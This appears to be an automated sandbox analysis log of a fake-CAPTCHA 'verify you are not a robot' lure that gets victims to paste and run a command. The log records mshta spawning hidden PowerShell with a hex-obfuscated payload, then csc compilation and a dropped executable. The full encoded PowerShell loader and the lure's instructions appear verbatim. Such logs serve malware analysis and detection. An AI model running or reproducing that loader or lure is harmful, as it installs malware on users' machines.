      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: netapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: pdh.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: powrprof.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: secur32.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: samcli.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: umpdc.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: perfos.dll
      Source: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function WXndL($cIxW){return -split ($cIxW -replace '..', '0x$& ')};$Ggxu = WXndL('7A5B64CCD96D57D64EFE4A812D2BC4BDE9AE1B1E7F65468F80EA3D5B60B7D7C15F2443A3E6237EAB1F9F3E91A5D835EB18A448CE892FC625BA5CB4E7734FA0B152E164A9AE08D0FEF9B18C700BA2C123C96722C862D347993D0AA1AF4AEEBDD9B33579FD0C0E3E8F4ED828B8EBE67830131A567BC4410ED3DE3DB182881AB06E5D1206E78F5AB5BC320CEB0CD1230E202D819C71580B2958CC5C0E8D1B8BD3370ED4F7231F1F5798BCD1F65460270B2E1E6ED59863C8B5F03F81A685BAD5E7B10E0FB9D1E708A9E5C024FA30DDC882FC492E0DF958455665B085A89C33E2271C0460170B1A544FCCC02AAD22554D5904FEDB87E26616ADC6815B78E3F211ECE66EE7D5818C58FD2367560D21420D5A870A96BF6813F16918FD2CAE995E81E5D5EEE764267ADB4E5F453DAC47D2AA762258E397C75CFF7333F5692FC5E25513BAC939EC2D35D580E47B773762AFA92B8C33B29E596DD3C52FB4B99790BC72803AD41F0A8088B6CBED15134D7A3795F91350D8363992E47BC33998786B02F2BC54DEADA79DA25CDD4E8456CDE732FF3D1BD51FFB619BBF4745E1D5B394630DE4C65145A4F40D54FC2FDFFF60DAC2370A34BE793B19A62E7BFB4C17185C1DC5324F37FFB32F313CB1BD87D5ED80FDE6998A2FA6EAE031759049B99236C74EBE0FCAA0366DFBD6D5203BB793793C30DD6C7711F139487A16F956DED2456E89DA6E8075E848518861F83E12FE6B6D9418FC30B86423F75566F6B84368C093B9C427A827CCA5508786A5C0C9C4FDC8098CF6F6387EF1B6779E7520FFA6CB54F1831F4AA87E12F048C0CF6F7626832EEACA8F18970723839BC8DF8E4A95B0792580CB979CFC7127742BFAC8575A87620516BE0330CEEEC026AE6DEF88079288ADA091993D6A1E4095B56E7A4972D51CC3305B770FFD659D6DF1A16842FAB38AB77C79C33863A3DDD3492894F183BE23A2F13E9B123C61AAA62EA17F6E370D5F5455BDCBE40447C979E2071A5E1C73DAB66505D5097B0CE259E3740A4D336C5D9D478B4BDD16372BC7EDFE1881DEA74E5B9CE7264F939FC71C1A404155682C546391908E072FABB77AFA55EF85CF8D463AF296CB5A97F75A04C27BB522CBD6647D3486CE6F1255A20C9F533CBB8E63861054920A4CAC251BCE2877D09D44209DF14F219EFB4C83461ED25DD05A3920BE2B123C394CC75C22C37A1CBE663656DBBC5E092E0B0019D2990501F5747EEBCB04B628410E9A300AEF287CFF0E6891F2F376C686F5FA861C85F88D563CE6DA2BAF185CC7C432FBC4291B50D6C71EC3AF86F793050E7DA9386849A66D23F884A8EBB084B1E52AFD97FC48ED50A9E6127344548B3E1D3FE46A9B700E23523933F2658A2E11359A7801DCFA20518A8C8ECFB897185694E264D854CE8307694F52B05B1F77A162CF1DD6266ACF5A7558C4494FF2E5B813EA6AA2F10A626FA53624CAEFB65B0BEBCCBCE907FC29AFF64D665F48576317019CB117E486DB9344CB12B5A4C8C99244F69A2C044F0C2B1E2C015323E6F2E9963937F86A2F610B470A787592B51B4A8A0AC1BEBCFBA6BDBBAE601BE25E9697ED1F1F6620B93F5E571C3E1A4F0E8C47093BF22DA12E6490B3AC878564D340B19F5614B1B063BD182E6D649D69AFD32FB57DDA451BB8764142FB0F42BE6E0189467BC1CB105D5FB522273E3782FDAA9E79D531A3BB879EA59043A20FED1EB60716386B9AAB98DC3EE64A1E470DA50DAC0026141747D5C0EED0044EC0D0915C02328F86F0BB7D373FB02861150AB1351E5702E10845E364532DF7DA550E8FADD43BC553C286B9362C8D94A1B01CBEED6A0696A644B4B1C4C07D01BE9FFFFE5E695FE16EEBAF8905BD570BE4B36D0F1C07D860553FBE42A1F44FEBF0A667E85D3544FE91FF701BE78DE167BB6758BB19538D1418D9B1403CFBD5C98DC579BAB71C1BA2BFB6A2ED52BC640E
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline"

      Persistence and Installation Behavior

      barindex
      Detect drive by download via clipboard copy & paste
      Source: screenshotOCR Text: x @ Anne Virgili X annavirgili.cam Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish verificatim, 07:28 ENG p Type here to search SG 12/12/2024
      Source: screenshotOCR Text: x Anne Virgili X annavirgili.cam Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish verificatim, 07:27 ENG p Type here to search SG 12/12/2024
      Source: screenshotOCR Text: @ Anne Virgili x X annavirgili.cam Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish verificatim, 07:28 ENG p Type here to search SG 12/12/2024
      Source: screenshotOCR Text: x Anne Virgili X annavirgili.cam Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish verificatim, 07:28 ENG p Type here to search SG 12/12/2024
      Source: screenshotOCR Text: x e Anne Virgili X annavirgili.cam Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish verificatim, 07:28 ENG p Type here to search SG 12/12/2024
      Source: Chrome DOM: 1.2OCR Text: Cornplete these Verification Steps To better prove you are not a robot. please: 1. Press & hold the R 2. In the verification window. press Ctrl + V, 3. Press Enter on your keyboard to finish. You will observe and agree: Perform the steps above to VERIFY finish verification-
      Source: screenshotOCR Text: x e Anne Virgili X annavirgili.cam Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish verificatim, 07:27 ENG p Type here to search SG 12/12/2024
      Source: Chrome DOM: 1.1OCR Text: Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key R 2. 16 the verification window. press Ctrl + V 3. Press Enter on your keyboard to finish, You wl observe and agree: Perform the steps above to VERIFY finish
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qwzwa2hv.dllJump to dropped file
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
